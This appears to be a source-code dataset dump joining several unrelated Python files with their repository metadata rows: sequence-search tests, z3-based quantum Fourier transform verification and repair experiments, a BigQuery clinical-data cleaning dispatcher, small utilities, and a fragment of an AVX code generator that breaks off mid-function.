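def double_sum(xs):
    # Analogue of func above: sum of each element doubled.
    return sum(x * 2 for x in xs)


pool = ThreadPool(processes=2)
try:
    results = pool.map(double_sum, [[i] * 10 for i in range(5)])
finally:
    # close/join mirrors the cleanup done at the end of every test.
    pool.close()
    pool.join()

assert results == [0, 20, 40, 60, 80]
```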
| 33.065163 | 87 | 0.564542 | 1,865 | 13,193 | 3.903485 | 0.124397 | 0.050824 | 0.055357 | 0.07239 | 0.781868 | 0.768819 | 0.767033 | 0.727885 | 0.702473 | 0.681044 | 0 | 0.042676 | 0.301978 | 13,193 | 398 | 88 | 33.148241 | 0.747855 | 0.200864 | 0 | 0.701439 | 0 | 0 | 0.01422 | 0 | 0 | 0 | 0 | 0 | 0.143885 | 1 | 0.122302 | false | 0.007194 | 0.028777 | 0.014388 | 0.194245 | 0.003597 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
55f57765b835e2c3bcb85c6d0d13e4704d963574 | 5,576 | py | Python | tests/test_sequence_searches.py | GeoffSCollins/PolTools | 1ea9b166efc56610c385802f9491b4c8ec25a1d0 | [
"MIT"
] | null | null | null | tests/test_sequence_searches.py | GeoffSCollins/PolTools | 1ea9b166efc56610c385802f9491b4c8ec25a1d0 | [
"MIT"
] | null | null | null | tests/test_sequence_searches.py | GeoffSCollins/PolTools | 1ea9b166efc56610c385802f9491b4c8ec25a1d0 | [
"MIT"
] | null | null | null | import unittest.mock
from pathlib import Path
from PolTools.main_programs import sequence_searches
from PolTools.main_programs.sequence_searches import InvalidSearchException
import io
from quieter import Quieter
class TestSequenceSearches(unittest.TestCase):
polr2a_region_file = str(Path(__file__).parent) + "/test_files/POLR2A_inr.bed"
# Has the sequence "CGAGTTCGCT GCTCAGAAGC" (+1 on right side of space)
ccnt1_region_file = str(Path(__file__).parent) + "/test_files/CCNT1_inr.bed"
# Has the sequence "AAGTGCCTGC AGCCTTCGCC" (+1 on right side of space)
def _parse_stdoutput(self, output):
# Returns the True or False value of the test
return output.split("\n")[1].split()[-1]
def test_no_arguments(self):
# Should print the usage
with self.assertRaises(SystemExit):
with Quieter():
sequence_searches.parse_input([])
def test_only_regions_file(self):
# Should print the usage
with self.assertRaises(SystemExit):
with Quieter():
sequence_searches.parse_input([self.polr2a_region_file])
def test_incorrect_search(self):
# Should raise an InvalidSearch error because of the underscore
with self.assertRaises(InvalidSearchException):
with Quieter():
sequence_searches.parse_input([self.polr2a_region_file, 'TATA,-5_7'])
def test_search_not_in_region(self):
# Should raise an InvalidSearch error because polr2a file is -10 to +10
with self.assertRaises(InvalidSearchException):
with Quieter():
sequence_searches.parse_input([self.polr2a_region_file, 'TATA,-20:-10'])
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_positive_strand_one_upstream_sequence_not_found(self, mock_stdout):
sequence_searches.main([self.polr2a_region_file, 'TTT,-10:-5'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "False")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_positive_strand_one_upstream_sequence_found(self, mock_stdout):
sequence_searches.main([self.polr2a_region_file, 'CGAGT,-10:-5'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "True")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_negative_strand_one_upstream_sequence_not_found(self, mock_stdout):
sequence_searches.main([self.ccnt1_region_file, 'TTT,-10:-5'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "False")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_negative_strand_one_upstream_sequence_found(self, mock_stdout):
sequence_searches.main([self.ccnt1_region_file, 'AAGTG,-10:-5'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "True")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_positive_strand_one_downstream_sequence_not_found(self, mock_stdout):
sequence_searches.main([self.polr2a_region_file, 'TTT,5:10'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "False")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_positive_strand_one_downstream_sequence_found(self, mock_stdout):
sequence_searches.main([self.polr2a_region_file, 'GAAGC,5:10'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "True")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_negative_strand_one_downstream_sequence_not_found(self, mock_stdout):
sequence_searches.main([self.ccnt1_region_file, 'TTT,5:10'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "False")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_negative_strand_one_downstream_sequence_found(self, mock_stdout):
sequence_searches.main([self.ccnt1_region_file, 'TCGCC,5:10'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "True")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_positive_strand_inr_sequence_not_found(self, mock_stdout):
sequence_searches.main([self.polr2a_region_file, 'TTT,-3:3'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "False")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_positive_strand_inr_sequence_found(self, mock_stdout):
sequence_searches.main([self.polr2a_region_file, 'GCTGCT,-3:3'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "True")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_negative_strand_inr_sequence_found(self, mock_stdout):
sequence_searches.main([self.ccnt1_region_file, 'TTT,-3:3'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "False")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_negative_strand_inr_sequence_not_found(self, mock_stdout):
sequence_searches.main([self.ccnt1_region_file, 'TGCAGC,-3:3'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "True")
if __name__ == '__main__':
unittest.main()
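The stdout-capture idiom used in every assertion test above — patching `sys.stdout` with a `StringIO` and then parsing the captured text — works outside a test class too. A minimal sketch (the `report` function is hypothetical, standing in for `sequence_searches.main`):

```python
import io
import unittest.mock


def report(found):
    """Hypothetical program that prints a header, then a result line."""
    print("search header")
    print("sequence found:", found)


with unittest.mock.patch("sys.stdout", new_callable=io.StringIO) as mock_stdout:
    report(True)

# Mirror of _parse_stdoutput: take the last token of the second line.
result = mock_stdout.getvalue().split("\n")[1].split()[-1]
assert result == "True"
```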
| 45.704918 | 88 | 0.720947 | 708 | 5,576 | 5.358757 | 0.148305 | 0.063258 | 0.053769 | 0.063258 | 0.85398 | 0.843437 | 0.833421 | 0.811281 | 0.792304 | 0.792304 | 0 | 0.014187 | 0.16571 | 5,576 | 121 | 89 | 46.082645 | 0.801376 | 0.064383 | 0 | 0.494382 | 0 | 0 | 0.071799 | 0.009791 | 0 | 0 | 0 | 0 | 0.179775 | 1 | 0.191011 | false | 0 | 0.067416 | 0.011236 | 0.303371 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3606ce17e9008136870cd62acc9a721583fe384f | 10,038 | py | Python | experiment_qft.py | fabianbauermarquart/quavl | 5e0a685912c2f914a9a3581ce65d76f3b05f7261 | [
"MIT"
] | null | null | null | experiment_qft.py | fabianbauermarquart/quavl | 5e0a685912c2f914a9a3581ce65d76f3b05f7261 | [
"MIT"
] | null | null | null | experiment_qft.py | fabianbauermarquart/quavl | 5e0a685912c2f914a9a3581ce65d76f3b05f7261 | [
"MIT"
] | null | null | null | from typing import List
import numpy as np
from z3 import If, Or, Not, And
from quavl.lib.constants import cos, sin, pi
from quavl.lib.expressions.complex import ComplexVal
from quavl.lib.expressions.qbit import Qbits, QbitVal
from quavl.lib.models.circuit import Circuit, Method
from quavl.lib.operations.gates import H, R, SWAP, Rx, Rz
from quavl.lib.solver import SpecificationType
def build_qft_specification(qbits: List[QbitVal]):
"""
Build specification for QFT.
:param qbits: qbits.
:return: specification.
"""
n = len(qbits)
output_bit_values = [If(q.beta.r == 1.0, 1.0, 0.0) for q in qbits]
output_bit_fractions = []
for i in range(n):
output_bit_fraction = 0.0
for j, k in enumerate(range(i, n)):
output_bit_fraction += output_bit_values[k] * (1 / (2 ** (j + 1)))
output_bit_fractions.append(output_bit_fraction)
inv_root2 = 1 / np.sqrt(2) # inv_root2 = 1 / Sqrt(Real(2))
output_specification = [QbitVal(
alpha=ComplexVal(r=inv_root2),
beta=ComplexVal(r=inv_root2 * cos(2 * pi * v),
i=inv_root2 * sin(2 * pi * v)))
for v in output_bit_fractions]
return output_specification
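The binary fractions built above encode the product form of the QFT, QFT|x_1...x_n> = tensor over l of (|0> + e^{2*pi*i*0.x_l...x_n}|1>)/sqrt(2). That identity can be checked numerically with plain numpy, independently of the solver — a sketch, using the e^{+2*pi*i} sign convention (hence `ifft`):

```python
import numpy as np

n = 3
N = 2 ** n

for x in range(N):
    bits = [(x >> (n - 1 - i)) & 1 for i in range(n)]  # bits[0] is the MSB
    state = np.array([1.0])
    for m in range(n):
        # Tensor factor m carries the binary fraction 0.b[n-1-m] ... b[n-1].
        fraction = sum(bits[n - 1 - m + t] / 2 ** (t + 1) for t in range(m + 1))
        qbit = np.array([1.0, np.exp(2j * np.pi * fraction)]) / np.sqrt(2)
        state = np.kron(state, qbit)
    # Compare against the corresponding column of the inverse DFT matrix.
    basis = np.zeros(N)
    basis[x] = 1.0
    expected = np.sqrt(N) * np.fft.ifft(basis)
    assert np.allclose(state, expected)
```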
def prove_qft():
"""
Correctness proof of the QFT.
"""
# Initialize circuit
q0, q1, q2 = Qbits(['q0', 'q1', 'q2'])
n = 3
circuit = Circuit([q0, q1, q2],
[
H(q0),
R(q0, 2).controlled_by(q1),
R(q0, 3).controlled_by(q2),
H(q1),
R(q1, 2).controlled_by(q2),
H(q2),
SWAP(q0, q2)
])
initial_values = [{(1, 0), (0, 1)} for _ in range(n)]
circuit.initialize_qbits(initial_values)
# Build specification
final_qbits = circuit.get_final_qbits()
spec_qbits = Qbits([f'spec_q{i}' for i in range(n)])
output_specification = build_qft_specification(circuit.qbits)
conjunction = []
for i in range(n):
conjunction.append(spec_qbits[i] == output_specification[i])
circuit.solver.add(And(conjunction))
circuit.final_qbits += spec_qbits
# Set specification
circuit.set_specification([(final_qbits[i], spec_qbits[i]) for i in range(n)],
SpecificationType.equality_pair_list)
# Prove and repair
circuit.prove(method=Method.qbit_sequence_model,
dump_smt_encoding=True,
dump_solver_output=True,
synthesize_repair=True)
def repair_phase_error_qft():
"""
    Repair of a faulty QFT with a phase error.
"""
# Initialize circuit
q0, q1, q2 = Qbits(['q0', 'q1', 'q2'])
n = 3
circuit = Circuit([q0, q1, q2],
[
H(q0),
R(q0, 2).controlled_by(q1),
R(q0, 3).controlled_by(q2),
H(q1),
R(q1, 2).controlled_by(q2),
H(q2),
SWAP(q0, q2)
])
initial_values = [{(1, 0), (0, 1)} for _ in range(n)]
circuit.initialize_qbits(initial_values)
# Build specification
final_qbits = circuit.get_final_qbits()
spec_qbits = Qbits([f'spec_q{i}' for i in range(n)])
output_specification = build_qft_specification(circuit.qbits)
conjunction = []
for i in range(n):
conjunction.append(spec_qbits[i] == output_specification[i])
circuit.solver.add(And(conjunction))
circuit.final_qbits += spec_qbits
# Set specification
circuit.set_specification([(final_qbits[i], spec_qbits[i]) for i in range(n)],
SpecificationType.equality_pair_list)
# Prove and repair
circuit.prove(method=Method.qbit_sequence_model,
dump_smt_encoding=True,
dump_solver_output=True,
synthesize_repair=True,
entangling_repair=True)


def repair_omission_qft():
    """
    Repair of a faulty QFT where a gate is omitted.
    """
    # Initialize circuit (the initial H(q0) is deliberately missing)
    q0, q1, q2 = Qbits(['q0', 'q1', 'q2'])
    n = 3

    circuit = Circuit([q0, q1, q2],
                      [
                          R(q0, 2).controlled_by(q1),
                          R(q0, 3).controlled_by(q2),
                          H(q1),
                          R(q1, 2).controlled_by(q2),
                          H(q2),
                          SWAP(q0, q2)
                      ])

    initial_values = [{(1, 0), (0, 1)} for _ in range(n)]
    circuit.initialize_qbits(initial_values)

    # Build specification
    final_qbits = circuit.get_final_qbits()
    spec_qbits = Qbits([f'spec_q{i}' for i in range(n)])
    output_specification = build_qft_specification(circuit.qbits)

    conjunction = []
    for i in range(n):
        conjunction.append(spec_qbits[i] == output_specification[i])
    circuit.solver.add(And(conjunction))
    circuit.final_qbits += spec_qbits

    # Set specification
    circuit.set_specification([(final_qbits[i], spec_qbits[i]) for i in range(n)],
                              SpecificationType.equality_pair_list)

    # Prove and repair
    circuit.prove(method=Method.qbit_sequence_model,
                  dump_smt_encoding=True,
                  dump_solver_output=True,
                  synthesize_repair=True,
                  entangling_repair=True,
                  entangling_gate_index=0)


def prove_repaired_qft_phase_error():
    """
    Prove the correctness of the repaired QFT with phase error.
    """
    # Initialize circuit
    q0, q1, q2 = Qbits(['q0', 'q1', 'q2'])
    n = 3

    # repair outcome: rotation, [-0.1, 0.1]
    rep_theta_0 = [0.0140625, 0.014062500000000002]
    rep_phi_0 = [-0.014062500000000002, -0.0140625]
    rep_theta_1 = [0.0140625, 0.014062500000000002]
    rep_phi_1 = [-0.014062500000000002, -0.0140625]
    rep_theta_2 = [0.0140625, 0.014062500000000002]
    rep_phi_2 = [-0.014062500000000002, -0.0140625]

    circuit = Circuit([q0, q1, q2],
                      [
                          H(q0),
                          R(q0, 2).controlled_by(q1),
                          R(q0, 3).controlled_by(q2),
                          H(q1),
                          R(q1, 2).controlled_by(q2),
                          H(q2),
                          SWAP(q0, q2),
                          Rx(q0, np.mean(rep_theta_0)),
                          Rz(q0, np.mean(rep_phi_0)),
                          Rx(q1, np.mean(rep_theta_1)),
                          Rz(q1, np.mean(rep_phi_1)),
                          Rx(q2, np.mean(rep_theta_2)),
                          Rz(q2, np.mean(rep_phi_2))
                      ])

    initial_values = [{(1, 0), (0, 1)} for _ in range(n)]
    circuit.initialize_qbits(initial_values)

    # Build specification (negated, for proof by refutation)
    final_qbits = circuit.get_final_qbits()
    spec_qbits = Qbits([f'spec_q{i}' for i in range(n)])
    output_specification = build_qft_specification(circuit.qbits)

    disjunction = []
    for i in range(n):
        disjunction.append(Not(spec_qbits[i] == output_specification[i]))
    circuit.solver.add(Or(disjunction))
    circuit.final_qbits += spec_qbits

    # Set specification
    circuit.set_specification([(final_qbits[i], spec_qbits[i]) for i in range(n)],
                              SpecificationType.equality_pair_list)

    # Prove
    circuit.prove(method=Method.qbit_sequence_model,
                  dump_smt_encoding=True,
                  dump_solver_output=True)


def prove_repaired_qft_rotation_large_interval():
    """
    Prove the correctness of the repaired QFT with the large interval rotation.
    """
    # Initialize circuit
    q0, q1, q2 = Qbits(['q0', 'q1', 'q2'])
    n = 3

    rep_theta_0 = [1.9148873922774943, 1.9148873922774945]
    rep_phi_0 = [-1.9148873922774945, -1.9148873922774943]
    rep_theta_1 = [1.9148873922774943, 1.9148873922774945]
    rep_phi_1 = [-1.9148873922774945, -1.9148873922774943]
    rep_theta_2 = [1.9148873922774943, 1.9148873922774945]
    rep_phi_2 = [-1.9148873922774945, -1.9148873922774943]

    circuit = Circuit([q0, q1, q2],
                      [
                          R(q0, 2).controlled_by(q1),
                          R(q0, 3).controlled_by(q2),
                          H(q1),
                          R(q1, 2).controlled_by(q2),
                          H(q2),
                          SWAP(q0, q2),
                          Rx(q0, np.mean(rep_theta_0)),
                          Rz(q0, np.mean(rep_phi_0)),
                          Rx(q1, np.mean(rep_theta_1)),
                          Rz(q1, np.mean(rep_phi_1)),
                          Rx(q2, np.mean(rep_theta_2)),
                          Rz(q2, np.mean(rep_phi_2))
                      ])

    initial_values = [{(1, 0), (0, 1)} for _ in range(n)]
    circuit.initialize_qbits(initial_values)

    # Build specification (negated, for proof by refutation)
    final_qbits = circuit.get_final_qbits()
    spec_qbits = Qbits([f'spec_q{i}' for i in range(n)])
    output_specification = build_qft_specification(circuit.qbits)

    disjunction = []
    for i in range(n):
        disjunction.append(Not(spec_qbits[i] == output_specification[i]))
    circuit.solver.add(Or(disjunction))
    circuit.final_qbits += spec_qbits

    # Set specification
    circuit.set_specification([(final_qbits[i], spec_qbits[i]) for i in range(n)],
                              SpecificationType.equality_pair_list)

    # Prove
    circuit.prove(method=Method.qbit_sequence_model,
                  dump_smt_encoding=True,
                  dump_solver_output=True)


if __name__ == "__main__":
    prove_qft()
    repair_phase_error_qft()
    repair_omission_qft()
    prove_repaired_qft_phase_error()
    prove_repaired_qft_rotation_large_interval()


# === tests/test_events.py (repo: stlk/pyworking.cz, license: MIT) ===

from pyworking_cz.model import load_events


def test_load_events():
    assert load_events()


# === data_steward/cdr_cleaner/clean_cdr.py (repo: berneskaracay/curation, license: MIT) ===

"""
A module to serve as the entry point to the cdr_cleaner package.
It gathers the list of query strings to execute and sends them
to the query engine.
"""
# Python imports
import logging

# Third party imports
from google.appengine.api import app_identity

# Project imports
import bq_utils
import constants.cdr_cleaner.clean_cdr as clean_cdr_consts
import cdr_cleaner.clean_cdr_engine as clean_engine

# cleaning rule imports
import cdr_cleaner.cleaning_rules.clean_years as clean_years
import cdr_cleaner.cleaning_rules.id_deduplicate as id_dedup
import cdr_cleaner.cleaning_rules.negative_ages as neg_ages
import cdr_cleaner.cleaning_rules.no_data_30_days_after_death as no_data_30days_after_death
import cdr_cleaner.cleaning_rules.null_invalid_foreign_keys as null_foreign_key
import cdr_cleaner.cleaning_rules.person_id_validator as person_validator
import cdr_cleaner.cleaning_rules.temporal_consistency as bad_end_dates
import cdr_cleaner.cleaning_rules.valid_death_dates as valid_death_dates
import cdr_cleaner.cleaning_rules.drug_refills_days_supply as drug_refills_supply

LOGGER = logging.getLogger(__name__)


def _gather_ehr_queries(project_id, dataset_id):
    """
    gathers all the queries required to clean ehr dataset

    :param project_id: project name
    :param dataset_id: ehr dataset name
    :return: returns list of queries
    """
    query_list = []
    query_list.extend(id_dedup.get_id_deduplicate_queries(project_id, dataset_id))
    return query_list


def _gather_rdr_queries(project_id, dataset_id):
    """
    gathers all the queries required to clean rdr dataset

    :param project_id: project name
    :param dataset_id: rdr dataset name
    :return: returns list of queries
    """
    query_list = []
    query_list.extend(id_dedup.get_id_deduplicate_queries(project_id, dataset_id))
    query_list.extend(clean_years.get_year_of_birth_queries(project_id, dataset_id))
    query_list.extend(neg_ages.get_negative_ages_queries(project_id, dataset_id))
    query_list.extend(bad_end_dates.get_bad_end_date_queries(project_id, dataset_id))
    return query_list


def _gather_ehr_rdr_queries(project_id, dataset_id):
    """
    gathers all the queries required to clean ehr_rdr dataset

    :param project_id: project name
    :param dataset_id: ehr_rdr dataset name
    :return: returns list of queries
    """
    query_list = []
    query_list.extend(id_dedup.get_id_deduplicate_queries(project_id, dataset_id))
    query_list.extend(null_foreign_key.null_invalid_foreign_keys(project_id, dataset_id))
    query_list.extend(clean_years.get_year_of_birth_queries(project_id, dataset_id))
    query_list.extend(neg_ages.get_negative_ages_queries(project_id, dataset_id))
    query_list.extend(bad_end_dates.get_bad_end_date_queries(project_id, dataset_id))
    query_list.extend(no_data_30days_after_death.no_data_30_days_after_death(project_id, dataset_id))
    query_list.extend(valid_death_dates.get_valid_death_date_queries(project_id, dataset_id))
    query_list.extend(drug_refills_supply.get_days_supply_refills_queries(project_id, dataset_id))
    return query_list


def _gather_ehr_rdr_de_identified_queries(project_id, dataset_id):
    """
    gathers all the queries required to clean de_identified dataset

    :param project_id: project name
    :param dataset_id: de_identified dataset name
    :return: returns list of queries
    """
    query_list = []
    query_list.extend(id_dedup.get_id_deduplicate_queries(project_id, dataset_id))
    query_list.extend(clean_years.get_year_of_birth_queries(project_id, dataset_id))
    query_list.extend(neg_ages.get_negative_ages_queries(project_id, dataset_id))
    query_list.extend(bad_end_dates.get_bad_end_date_queries(project_id, dataset_id))
    query_list.extend(person_validator.get_person_id_validation_queries(project_id, dataset_id))
    query_list.extend(valid_death_dates.get_valid_death_date_queries(project_id, dataset_id))
    query_list.extend(drug_refills_supply.get_days_supply_refills_queries(project_id, dataset_id))
    return query_list


def _gather_unioned_ehr_queries(project_id, dataset_id):
    """
    gathers all the queries required to clean unioned_ehr dataset

    :param project_id: project name
    :param dataset_id: unioned_ehr dataset name
    :return: returns list of queries
    """
    query_list = []
    query_list.extend(id_dedup.get_id_deduplicate_queries(project_id, dataset_id))
    query_list.extend(clean_years.get_year_of_birth_queries(project_id, dataset_id))
    query_list.extend(neg_ages.get_negative_ages_queries(project_id, dataset_id))
    query_list.extend(bad_end_dates.get_bad_end_date_queries(project_id, dataset_id))
    query_list.extend(valid_death_dates.get_valid_death_date_queries(project_id, dataset_id))
    query_list.extend(drug_refills_supply.get_days_supply_refills_queries(project_id, dataset_id))
    return query_list
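# Every _gather_* helper above follows the same shape: build a flat list of SQL
# strings from independent rule modules, then hand the list to the engine. A
# minimal stand-alone sketch of that pattern (the rule functions and query
# strings here are illustrative stand-ins, not the real cleaning rules):

```python
def dedup_rule(project_id, dataset_id):
    # stand-in for e.g. id_dedup.get_id_deduplicate_queries
    return ['DELETE dupes FROM %s.%s' % (project_id, dataset_id)]

def year_rule(project_id, dataset_id):
    # stand-in for e.g. clean_years.get_year_of_birth_queries
    return ['UPDATE years IN %s.%s' % (project_id, dataset_id)]

def gather_queries(project_id, dataset_id, rules):
    query_list = []
    for rule in rules:
        query_list.extend(rule(project_id, dataset_id))
    return query_list

queries = gather_queries('my-project', 'rdr', [dedup_rule, year_rule])
print(len(queries))  # → 2
```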


def clean_rdr_dataset(project_id=None, dataset_id=None):
    """
    Run all clean rules defined for the rdr dataset.

    :param project_id: Name of the BigQuery project.
    :param dataset_id: Name of the dataset to clean
    """
    if dataset_id is None or dataset_id == '' or dataset_id.isspace():
        dataset_id = bq_utils.get_rdr_dataset_id()
        LOGGER.info('Dataset is unspecified. Using default value of:\t%s', dataset_id)

    query_list = _gather_rdr_queries(project_id, dataset_id)

    LOGGER.info("Cleaning rdr_dataset")
    clean_engine.clean_dataset(project_id, dataset_id, query_list)


def clean_ehr_dataset(project_id=None, dataset_id=None):
    """
    Run all clean rules defined for the ehr dataset.

    :param project_id: Name of the BigQuery project.
    :param dataset_id: Name of the dataset to clean
    """
    if dataset_id is None or dataset_id == '' or dataset_id.isspace():
        dataset_id = bq_utils.get_dataset_id()
        LOGGER.info('Dataset is unspecified. Using default value of:\t%s', dataset_id)

    query_list = _gather_ehr_queries(project_id, dataset_id)

    LOGGER.info("Cleaning ehr_dataset")
    clean_engine.clean_dataset(project_id, dataset_id, query_list)


def clean_unioned_ehr_dataset(project_id=None, dataset_id=None):
    """
    Run all clean rules defined for the unioned ehr dataset.

    :param project_id: Name of the BigQuery project.
    :param dataset_id: Name of the dataset to clean
    """
    if dataset_id is None or dataset_id == '' or dataset_id.isspace():
        dataset_id = bq_utils.get_unioned_dataset_id()
        LOGGER.info('Dataset is unspecified. Using default value of:\t%s', dataset_id)

    query_list = _gather_unioned_ehr_queries(project_id, dataset_id)

    LOGGER.info("Cleaning unioned_dataset")
    clean_engine.clean_dataset(project_id, dataset_id, query_list)


def clean_ehr_rdr_dataset(project_id=None, dataset_id=None):
    """
    Run all clean rules defined for the ehr and rdr dataset.

    :param project_id: Name of the BigQuery project.
    :param dataset_id: Name of the dataset to clean
    """
    if dataset_id is None or dataset_id == '' or dataset_id.isspace():
        dataset_id = bq_utils.get_ehr_rdr_dataset_id()
        LOGGER.info('Dataset is unspecified. Using default value of:\t%s', dataset_id)

    query_list = _gather_ehr_rdr_queries(project_id, dataset_id)

    LOGGER.info("Cleaning ehr_rdr_dataset")
    clean_engine.clean_dataset(project_id, dataset_id, query_list)


def clean_ehr_rdr_de_identified_dataset(project_id=None, dataset_id=None):
    """
    Run all clean rules defined for the deidentified ehr and rdr dataset.

    :param project_id: Name of the BigQuery project.
    :param dataset_id: Name of the dataset to clean
    """
    if dataset_id is None or dataset_id == '' or dataset_id.isspace():
        dataset_id = bq_utils.get_combined_deid_dataset_id()
        LOGGER.info('Dataset is unspecified. Using default value of:\t%s', dataset_id)

    query_list = _gather_ehr_rdr_de_identified_queries(project_id, dataset_id)

    LOGGER.info("Cleaning de-identified dataset")
    clean_engine.clean_dataset(project_id, dataset_id, query_list)
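# Each clean_* wrapper uses the same fallback guard for an unset dataset id
# (None, empty, or whitespace-only falls back to a default). The guard in
# isolation, with hypothetical dataset names:

```python
def resolve_dataset_id(dataset_id, default_id):
    # same short-circuiting guard as the clean_* wrappers above
    if dataset_id is None or dataset_id == '' or dataset_id.isspace():
        return default_id
    return dataset_id

print(resolve_dataset_id(None, 'rdr2019'))        # → rdr2019
print(resolve_dataset_id('   ', 'rdr2019'))       # → rdr2019
print(resolve_dataset_id('combined', 'rdr2019'))  # → combined
```

Note the order matters: `dataset_id.isspace()` is only reached once the `None` and empty-string cases have short-circuited, so it never raises `AttributeError`.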


def get_dataset_and_project_names():
    """
    Get project and dataset names from environment variables.

    :return: A dictionary of dataset names and project name
    """
    project_and_dataset_names = dict()
    project_and_dataset_names[clean_cdr_consts.EHR_DATASET] = bq_utils.get_dataset_id()
    project_and_dataset_names[clean_cdr_consts.UNIONED_EHR_DATASET] = bq_utils.get_unioned_dataset_id()
    project_and_dataset_names[clean_cdr_consts.RDR_DATASET] = bq_utils.get_rdr_dataset_id()
    project_and_dataset_names[clean_cdr_consts.EHR_RDR_DATASET] = bq_utils.get_ehr_rdr_dataset_id()
    project_and_dataset_names[clean_cdr_consts.EHR_RDR_DE_IDENTIFIED] = bq_utils.get_combined_deid_dataset_id()
    project_and_dataset_names[clean_cdr_consts.PROJECT] = app_identity.get_application_id()
    return project_and_dataset_names


def clean_all_cdr():
    """
    Runs cleaning rules on all the datasets
    """
    id_dict = get_dataset_and_project_names()
    project = id_dict[clean_cdr_consts.PROJECT]

    clean_ehr_dataset(project, id_dict[clean_cdr_consts.EHR_DATASET])
    clean_unioned_ehr_dataset(project, id_dict[clean_cdr_consts.UNIONED_EHR_DATASET])
    clean_rdr_dataset(project, id_dict[clean_cdr_consts.RDR_DATASET])
    clean_ehr_rdr_dataset(project, id_dict[clean_cdr_consts.EHR_RDR_DATASET])
    clean_ehr_rdr_de_identified_dataset(
        project, id_dict[clean_cdr_consts.EHR_RDR_DE_IDENTIFIED]
    )


if __name__ == '__main__':
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument('-s', action='store_true', help='Send logs to console')
    args = parser.parse_args()
    clean_engine.add_console_logging(args.s)
    clean_all_cdr()


# === main.py (repo: Baldwin90/thenewboston-python-client, license: MIT) ===

print('Hello cruel world.')


# === f_monthpython/f_monthpython/views.py (repo: koffi09/Parissssportif, license: Apache-2.0) ===

from django.shortcuts import render


def home(request):
    return render(request, 'home.html')


# === contrib/action_recognition/r2p1d/vu/utils/__init__.py (repo: revodavid/ComputerVision, license: MIT) ===

from .common import Config, system_info


# === openpecha/catalog/utils.py (repo: ta4tsering/openpecha-toolkit, license: Apache-2.0) ===

from openpecha.config import N_SIG, PECHA_PREFIX


def create_pecha_id(num):
    return f"{PECHA_PREFIX}{num:0{N_SIG}}"
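# The f-string above zero-pads the numeric id to N_SIG digits. A quick
# illustration of the format (PECHA_PREFIX and N_SIG values here are made-up
# stand-ins, not openpecha's actual configuration):

```python
PECHA_PREFIX = 'P'   # hypothetical values; openpecha's real config may differ
N_SIG = 6

def create_pecha_id(num):
    # {num:0{N_SIG}} means: pad `num` with leading zeros to N_SIG digits
    return f"{PECHA_PREFIX}{num:0{N_SIG}}"

print(create_pecha_id(42))  # → P000042
```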


# === slingen/src/isas/avx.py (repo: danielesgit/slingen, license: BSD-3-Clause) ===

'''
Created on Apr 18, 2012
@author: danieles
'''
import sys
from sympy import sympify
from islpy import Set, Map
from src.dsls.ll import Matrix, ZeroMatrix, Symmetric, LowerTriangular, UpperTriangular, LowerUnitTriangular, UpperUnitTriangular, IdentityMatrix, AllEntriesConstantMatrix
from src.binding import getReference, ScalarsReference
from src.irbase import RValue, Pointer, VecAccess, VecDest, MovStatement, Mov, Comment, AddressOf, sa, V, DebugPrint, icode
from src.isas.isabase import ISA, Loader, Storer, LoadReplacer
from src.isas.sse2 import mmLoadSd, mmStoreSd, mmDivPd, mmSqrtPd
# from src.isas.sse4_1 import SSE4_1, SSSE3, SSE3, SSE2, SSE, x86
# from src.isas.isabase import *
# from src.isas.x86 import *
# from src.isas.sse import *
# from src.isas.sse2 import *
# from src.isas.sse3 import *
# from src.isas.ssse3 import *
# from src.isas.sse4_1 import *


class mm256LoadGs(RValue, VecAccess):
    ''' Wrapper of a vector load instruction.
    Useful when we want to represent a composite load instruction as a single logical instruction and then have it
    easily replaced by a scalar during scalar replacement.
    '''
    def __init__(self, pointer, mrmap, isCompact=True, isCorner=False, horizontal=True, zeromask=[]):
        super(mm256LoadGs, self).__init__()
        self.pointer = pointer
        self.mrmap = mrmap
        self.isCompact = isCompact
        self.isCorner = isCorner
        self.horizontal = horizontal
        self.orientation = 'horizontal' if horizontal else 'vertical'
        self.zeromask = zeromask
        self.reglen = 8
        self.analysis = None
        self._content = None

    @property
    def content(self):
        if self._content is None:
            self._content = self.generateContent()
        return self._content
    def generateContent(self):
        mrmap = self.mrmap
        pointer = self.pointer
        zeromask = self.zeromask
        horizontal = self.horizontal
